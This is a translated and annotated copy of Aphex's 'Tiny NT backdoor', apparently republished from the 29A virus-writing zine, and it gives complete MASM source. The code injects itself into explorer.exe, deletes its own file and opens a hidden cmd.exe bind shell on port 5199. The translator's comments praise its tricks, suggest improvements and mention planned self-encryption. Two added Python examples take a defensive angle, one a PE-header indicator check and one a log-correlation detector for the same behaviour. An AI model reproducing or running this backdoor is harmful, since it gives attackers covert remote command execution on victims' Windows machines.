Tiny NT backdoor by Aphex (translated by icyfox) [classic!]


; Tiny NT backdoor by Aphex
; http://www.iamaphex.cjb.net
; unremote@knology.net
; Original: 29A #7 [index - utilities - tiny nt backdoor (aphex)]
Translation: icyfox [Ice Fox prodigal son] / CVC translation team
I am often frustrated by my poor English.
To support the CVC translation effort, we decided to start with something that hardly needs translating.
I convey the original meaning rather than translating literally.
I have added some comments to the source code.
I hope you all keep working hard; I am your super supporter.

; Let's begin!

When the program runs, it injects a remote thread into the explorer.exe process that listens on port 5199,
and it deletes its own file from inside that remote thread, so no trace is left!

The injected thread creates a piped DOS command shell (cmd.exe) for each connection and uses it to execute commands;
when the connection is closed, the cmd.exe process is terminated.
The link command is as follows:
; [Translator's note: note /base:0x13140000, i.e. the base address is changed. This is the highlight of this program! Because of it, no relocation is needed.]

; Linker options: /base:0x13140000 /filealign:0x200 /merge:.data=.text /section:.text,RWX /subsystem:windows /libpath:\masm32\lib backdoor.obj
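The linker options above (fixed base 0x13140000, .data merged into .text, .text marked RWX) leave a recognisable footprint in the PE headers, and the start code of the program later reads those same headers (e_lfanew, IMAGE_FILE_HEADER, SizeOfImage) to learn its own image size. The following Python script is an added example, not part of Aphex's source or of the translation: it constructs a minimal PE32 header (not a loadable executable) laid out the way those options would produce it, parses it with the same header walk, and reports the indicators a file scanner could flag. The flag constants and header offsets come from the PE/COFF specification; the sample layout and the DEFAULT_EXE_BASE value of 0x00400000 (the linker's default for a 32-bit EXE) are assumptions of the example.

```python
import struct

# Section characteristic flags (IMAGE_SCN_MEM_*) from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
DEFAULT_EXE_BASE = 0x00400000  # assumed: the linker's default image base for a 32-bit EXE


def build_sample_pe(image_base, sections):
    """Build a constructed, minimal PE32 header: DOS header, PE signature,
    COFF file header, optional header and one section header per entry.
    Only the fields the checks below read are meaningful; it is not loadable."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                      # IMAGE_OPTIONAL_HEADER32 is 224 bytes
    struct.pack_into("<H", opt, 0, 0x10B)     # Magic = PE32
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 56, 0x2000)   # SizeOfImage (constructed value)
    sect = b""
    for name, chars in sections:
        # IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
        sect += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, chars)
    return dos + b"PE\0\0" + coff + bytes(opt) + sect


def parse_pe(data):
    """Walk the headers the same way the program's start code does:
    e_lfanew -> skip the signature and IMAGE_FILE_HEADER -> optional header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff_off = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff_off + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff_off + 16)[0]
    opt_off = coff_off + 20  # sizeof IMAGE_FILE_HEADER
    if struct.unpack_from("<H", data, opt_off)[0] != 0x10B:
        raise ValueError("only PE32 images are handled here")
    image_base = struct.unpack_from("<I", data, opt_off + 28)[0]
    size_of_image = struct.unpack_from("<I", data, opt_off + 56)[0]
    sections = []
    for i in range(nsections):
        off = opt_off + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, chars))
    return {"image_base": image_base, "size_of_image": size_of_image, "sections": sections}


def suspicious_link_profile(info):
    """Return the indicators that match the layout the linker options above produce."""
    findings = []
    if info["image_base"] != DEFAULT_EXE_BASE:
        findings.append("non-default image base 0x%08x" % info["image_base"])
    rwx = [name for name, chars in info["sections"] if (chars & RWX) == RWX]
    if rwx:
        findings.append("writable and executable section(s): " + ", ".join(rwx))
    if len(info["sections"]) == 1:
        findings.append("single section (data merged into code)")
    return findings


# Constructed samples: one laid out like the backdoor, one like a typical EXE.
SAMPLE_BACKDOOR_LAYOUT = build_sample_pe(0x13140000, [(b".text", RWX)])
SAMPLE_TYPICAL_LAYOUT = build_sample_pe(DEFAULT_EXE_BASE, [
    (b".text", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
    (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    for label, blob in (("backdoor-like", SAMPLE_BACKDOOR_LAYOUT), ("typical", SAMPLE_TYPICAL_LAYOUT)):
        print(label, suspicious_link_profile(parse_pe(blob)))
```

None of the three indicators is conclusive on its own (packers and some compilers also emit RWX or single-section images), but together they describe exactly what /base, /merge and /section produce, and SizeOfImage read from the same header is the amount of memory the injector later copies into the target process.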

.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\wsock32.inc
includelib \masm32\lib\wsock32.lib

.data
szTarget byte 'Shell_TrayWnd', 0      ; this window belongs to the explorer.exe process
szUser32 byte 'user32.dll', 0         ; these two DLLs are loaded in the remote thread,
szWinsock byte 'wsock32.dll', 0       ; although explorer.exe has already loaded them itself
szCommandLine byte 'cmd.exe', 0
szSharedData byte 261 dup(0)          ; the program's own path is saved here for later use

.data?
hModule dword ?
hNewModule dword ?
hProcess dword ?
dwSize dword ?
dwPid dword ?
dwBytesWritten dword ?
dwTid dword ?
wsadata WSADATA <>

.code
; ShellClient provides a piped cmd.exe shell for each connection

ShellClient proc dwSock:DWORD
    LOCAL sat:SECURITY_ATTRIBUTES
    LOCAL hiRead:DWORD
    LOCAL hoRead:DWORD
    LOCAL hiWrite:DWORD
    LOCAL hoWrite:DWORD
    LOCAL startupinfo:STARTUPINFO
    LOCAL processinfo:PROCESS_INFORMATION
    LOCAL exitcode:DWORD
    LOCAL buffer[1024]:BYTE
    LOCAL bytes:DWORD
    LOCAL available:DWORD
    LOCAL data:DWORD

    mov sat.nLength, sizeof SECURITY_ATTRIBUTES
    mov sat.lpSecurityDescriptor, 0
    mov sat.bInheritHandle, TRUE
    ; create the anonymous input and output pipes
    invoke CreatePipe, ADDR hiRead, ADDR hiWrite, ADDR sat, 0
    invoke CreatePipe, ADDR hoRead, ADDR hoWrite, ADDR sat, 0

    ; create a cmd.exe process whose standard input and output are the pipes,
    ; for command execution and returning the results
    invoke GetStartupInfo, ADDR startupinfo
    mov startupinfo.cb, sizeof startupinfo
    mov eax, hoWrite
    mov startupinfo.hStdOutput, eax
    mov startupinfo.hStdError, eax
    mov eax, hiRead
    mov startupinfo.hStdInput, eax
    mov startupinfo.dwFlags, STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES
    mov startupinfo.wShowWindow, SW_HIDE
    invoke CreateProcess, 0, ADDR szCommandLine, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, ADDR startupinfo, ADDR processinfo

    invoke CloseHandle, hoWrite
    invoke CloseHandle, hiRead
    mov bytes, 1
    invoke ioctlsocket, dwSock, FIONBIO, ADDR bytes   ; switch the socket to non-blocking mode

    .while TRUE
        invoke Sleep, 1

        ; close the connection once the cmd process has exited
        invoke GetExitCodeProcess, processinfo.hProcess, ADDR exitcode
        .if exitcode != STILL_ACTIVE
            .break
        .endif

        ; read the command output and send it back
        invoke PeekNamedPipe, hoRead, ADDR buffer, 1024, ADDR bytes, ADDR available, 0
        .if bytes != 0
            .if available > 1024
                .while bytes >= 1024
                    invoke Sleep, 1
                    invoke ReadFile, hoRead, ADDR buffer, 1024, ADDR bytes, 0
                    .if bytes != 0
                        invoke send, dwSock, ADDR buffer, bytes, 0
                    .endif
                .endw
            .else
                invoke ReadFile, hoRead, ADDR buffer, 1024, ADDR bytes, 0
                .if bytes != 0
                    invoke send, dwSock, ADDR buffer, bytes, 0
                .endif
            .endif
        .endif

        ; receive a command and write it into the pipe for execution
        invoke recv, dwSock, ADDR buffer, 1024, 0
        .if eax == SOCKET_ERROR || eax == 0
            invoke WSAGetLastError
            .if eax == WSAEWOULDBLOCK
                .continue
            .else
                invoke TerminateProcess, processinfo.hProcess, 0   ; terminate the cmd process when the connection drops
                .break
            .endif
        .else
            mov edx, eax
            invoke WriteFile, hiWrite, ADDR buffer, edx, ADDR bytes, 0
            ; [Translator's note: a send could be added here to echo the command;
            ; otherwise you cannot see what you typed, only the result. Like a blind man ^_^]
        .endif
    .endw
    ; close the pipes and the connection
    invoke CloseHandle, hiWrite
    invoke CloseHandle, hoRead
    invoke closesocket, dwSock
    ret
ShellClient endp

; Shelld is the entry point of the remote thread
Shelld proc
    LOCAL sockaddrin:sockaddr_in
    LOCAL dwSock:DWORD
    LOCAL dwMode:DWORD

    invoke DeleteFile, ADDR szSharedData   ; self-deletion
    invoke LoadLibrary, ADDR szUser32      ; load the DLLs;
    invoke LoadLibrary, ADDR szWinsock     ; this seems unnecessary

    ; initialise Winsock and listen on port 5199
    invoke WSAStartup, 101h, ADDR wsadata
    invoke socket, PF_INET, SOCK_STREAM, 0
    mov dwSock, eax
    mov sockaddrin.sin_family, AF_INET
    invoke htons, 5199
    mov sockaddrin.sin_port, ax
    mov sockaddrin.sin_addr, INADDR_ANY
    invoke bind, dwSock, ADDR sockaddrin, sizeof sockaddrin
    mov dwMode, 1
    invoke ioctlsocket, dwSock, FIONBIO, ADDR dwMode
    invoke listen, dwSock, SOMAXCONN
@@:
    invoke accept, dwSock, ADDR sockaddrin, 0
    .if eax != INVALID_SOCKET
        mov edx, eax
        ; create a thread to handle the connection, i.e. ShellClient above
        invoke CreateThread, 0, 0, ADDR ShellClient, edx, 0, 0
        invoke CloseHandle, eax
    .endif
    invoke Sleep, 1000
    jmp @B
    ret
Shelld endp

start:

    ; read the base address and size of its own memory image
    invoke GetModuleHandle, 0
    mov hModule, eax               ; save the base address here
    mov edi, eax
    assume edi:PTR IMAGE_DOS_HEADER
    add edi, [edi].e_lfanew
    add edi, sizeof DWORD
    add edi, sizeof IMAGE_FILE_HEADER
    assume edi:PTR IMAGE_OPTIONAL_HEADER32
    mov eax, [edi].SizeOfImage
    mov dwSize, eax                ; size of the memory image
    assume edi:nothing

    invoke GetModuleFileName, 0, ADDR szSharedData, 261   ; save its own path for later use

    ; find explorer.exe and obtain access to the process
    invoke FindWindow, ADDR szTarget, 0
    invoke GetWindowThreadProcessId, eax, ADDR dwPid
    invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, dwPid
    mov hProcess, eax

    ; allocate memory in the explorer.exe process and write the whole of its own image there.
    ; The allocated memory starts at 0x13140000, i.e. the base address of the memory image,
    ; which is also why the link base address was fixed.

    invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE
    invoke VirtualAllocEx, hProcess, hModule, dwSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE
    mov hNewModule, eax
    invoke WriteProcessMemory, hProcess, hNewModule, hModule, dwSize, ADDR dwBytesWritten

    ; create the remote thread in explorer.exe
    invoke CreateRemoteThread, hProcess, 0, 0, ADDR Shelld, hModule, 0, ADDR dwTid
    invoke ExitProcess, 0
end start
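From a monitoring point of view, the program leaves three observable steps that can be tied together by the explorer.exe process id: a remote thread is created in explorer.exe by a process whose image is on disk (and is then deleted), explorer.exe starts accepting inbound TCP connections on port 5199, and explorer.exe spawns hidden cmd.exe children. The Python script below is an added example and not part of the original source or translation. It runs over constructed, simplified log lines in a key=value format loosely modelled on Sysmon event types 8 (CreateRemoteThread), 3 (network connection) and 1 (process creation); the field names and the sample values (paths, pids, the start address 0x13140260) are assumptions of the example, not a real schema or real telemetry.

```python
import re

# Constructed sample telemetry in a simplified "EventID=N key=value ..." line format,
# loosely modelled on Sysmon event types (8 = CreateRemoteThread, 3 = network
# connection, 1 = process creation). These lines are made up for this example.
SAMPLE_LOG = r"""
EventID=1 ProcessId=4412 Image=C:\Users\bob\Downloads\update.exe ParentProcessId=1320 ParentImage=C:\Windows\explorer.exe CommandLine=update.exe
EventID=8 SourceProcessId=4412 SourceImage=C:\Users\bob\Downloads\update.exe TargetProcessId=1320 TargetImage=C:\Windows\explorer.exe StartAddress=0x13140260
EventID=3 ProcessId=1320 Image=C:\Windows\explorer.exe Initiated=false Protocol=tcp LocalPort=5199 RemoteIp=10.0.0.7 RemotePort=51044
EventID=1 ProcessId=5020 Image=C:\Windows\System32\cmd.exe ParentProcessId=1320 ParentImage=C:\Windows\explorer.exe CommandLine=cmd.exe
EventID=3 ProcessId=2208 Image=C:\Program Files\Browser\browser.exe Initiated=true Protocol=tcp LocalPort=50311 RemoteIp=93.184.216.34 RemotePort=443
EventID=1 ProcessId=6100 Image=C:\Windows\System32\cmd.exe ParentProcessId=1320 ParentImage=C:\Windows\explorer.exe CommandLine=cmd.exe /c dir
"""


def parse_line(line):
    """Split one 'key=value key=value' line; values may contain spaces (e.g. paths)."""
    fields = {}
    for token in re.split(r" (?=\w+=)", line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def image_is(ev, key, basename):
    """True if the image path stored under `key` ends with the given file name."""
    return ev.get(key, "").lower().endswith("\\" + basename)


def detect(lines):
    """Correlate the three behaviours the backdoor exhibits, keyed on the explorer.exe
    process that received the remote thread. Returns (severity, message) tuples."""
    injected = {}  # explorer.exe pid -> image of the process that created a thread in it
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        eid = ev.get("EventID")
        if eid == "8" and image_is(ev, "TargetImage", "explorer.exe"):
            pid = ev.get("TargetProcessId")
            injected[pid] = ev.get("SourceImage")
            findings.append(("medium", f"remote thread created in explorer.exe (pid {pid}) by "
                                       f"{injected[pid]} at {ev.get('StartAddress')}"))
        elif eid == "3" and ev.get("ProcessId") in injected and ev.get("Initiated") == "false":
            findings.append(("high", f"injected explorer.exe (pid {ev['ProcessId']}) accepted an inbound "
                                     f"connection on port {ev.get('LocalPort')} from {ev.get('RemoteIp')}"))
        elif eid == "1" and ev.get("ParentProcessId") in injected and image_is(ev, "Image", "cmd.exe"):
            findings.append(("high", f"injected explorer.exe (pid {ev['ParentProcessId']}) spawned "
                                     f"cmd.exe (pid {ev.get('ProcessId')}): {ev.get('CommandLine')}"))
    return findings


if __name__ == "__main__":
    for severity, message in detect(SAMPLE_LOG.strip().splitlines()):
        print(f"[{severity}] {message}")
```

explorer.exe spawning cmd.exe is ordinary user activity, so the rule only raises it once a remote thread has been seen entering that particular explorer.exe pid; the inbound connection on an explorer.exe pid is likewise only meaningful in that context. The thread start address in the constructed event falls inside the copied image at 0x13140000 rather than inside any loaded module, which is another property worth checking in real CreateRemoteThread telemetry.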

Appendix: I have discussed with Cai Cai the program's self-encryption; I hope he can produce a model.
